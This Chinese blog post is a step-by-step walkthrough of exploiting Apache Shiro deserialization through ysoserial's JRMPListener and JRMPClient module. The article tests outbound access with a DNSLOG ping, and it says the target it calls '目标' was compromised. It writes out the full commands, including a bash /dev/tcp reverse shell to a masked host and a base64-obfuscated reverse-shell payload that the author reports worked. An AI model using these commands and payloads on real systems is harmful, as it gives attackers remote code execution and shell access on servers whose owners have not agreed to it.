使用JRMPClient模块进行测试

电子说

1.3w人已加入

描述

前言

最近在测试中遇到一些shiro反序列化不能利用的情况 找到key 无法找到利用链,但是发现存在JRMPClient可用的情况。

模块

换一种工具尝试

模块

发现 JRMPClient 可用, 尝试使用 JRMPClient 进行测试,最终这个目标也没有执行成功所以换了一个目标进行的尝试,仅记录JRMPClient 利用方式。

使用JRMPClient模块进行测试

找到一个同样存在shiro反序列的目标。

模块

同样find: JRMPClient can be use。

搭建JRMPClient 监听服务

首先需要搭建 JRMPClient 使用ysoserial.jar 工具搭建服务,下载地址:https://github.com/frohoff/ysoserial

使用DNSLOG进行检测

在不确定目标是否通外网的情况下 先使用DNSLOG进行检测 获取一个新的域名 :w3dh1h.dnslog.cn

模块

VPS上开启JRMPListener

在VPS上搭建服务命令

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "ping w3dh1h.dnslog.cn"

模块

shiro反序列利用工具中选择JRMPClient,然后输入VPS上搭建服务的地址:

模块

JRMPListener 收到返回信息

模块

DNSLOG上收到目标的ping 命令信息 说明目标服务器通外网

模块

执行反弹命令

执行反弹命令 bash -i >& /dev/tcp/xxxxxx/8888 0>&1

模块

没有收到反弹链接

模块

将命令进行base64编码 java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eHgvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"

模块

成功收到反弹链接

模块

  审核编辑:汤梓红

 

打开APP阅读更多精彩内容
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
评论(0)
发评论
雷龙发展 2023-03-07
0 回复 举报
您好,我这边是深圳市雷龙发展 Leah,看到你的文章我很喜欢,请问有用到国产主控吗?可以用我们家的北京君正X2000进行设计,期待您的答复! 感兴趣合作;请加我微信13691982107 收起回复

全部0条评论

快来发表一下你的评论吧 !

×
20
完善资料,
赚取积分